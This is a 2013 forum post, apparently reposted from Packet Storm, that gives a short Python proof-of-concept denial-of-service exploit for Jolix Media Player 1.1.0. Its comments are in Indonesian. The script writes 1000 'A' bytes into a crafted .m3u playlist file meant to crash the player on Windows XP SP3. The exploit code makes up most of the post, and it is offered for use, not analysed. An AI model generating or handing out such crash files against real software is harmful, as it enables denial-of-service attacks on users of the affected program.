Matt Posted July 11, 2013 Report Posted July 11, 2013 Description : Jolix Media Player version 1.1.0 suffers from a denial of service vulnerability.Author : IndonesiaGokilTeamSource : Jolix Media Player 1.1.0 Denial Of Service ? Packet StormCode : #!/usr/bin/pythonprint """ [+]Judul Ledakan:Jolix Media Player (.m3u) Denial of Service Exploit [+]Celah versi: Version 1.1.0 [+]Mengunduh produk: [url]http://www.jolixtools.com/downloads/jolix-media-player-setup.exe[/url] [+]Hari Tanggal Tahun: 09.07.2013 [+]Penulis: IndonesiaGokilTeam [+]Dicoba di sistem operasi: Windows xp sp 3 """sampah = "\x41" * 1000ledakan = sampahtry: rst= open("SampahMasyarakat.m3u",'w') rst.write(ledakan) rst.close() print("\nFile Sampah Masyarakat dibuat !\n")except: print "Gagal" Quote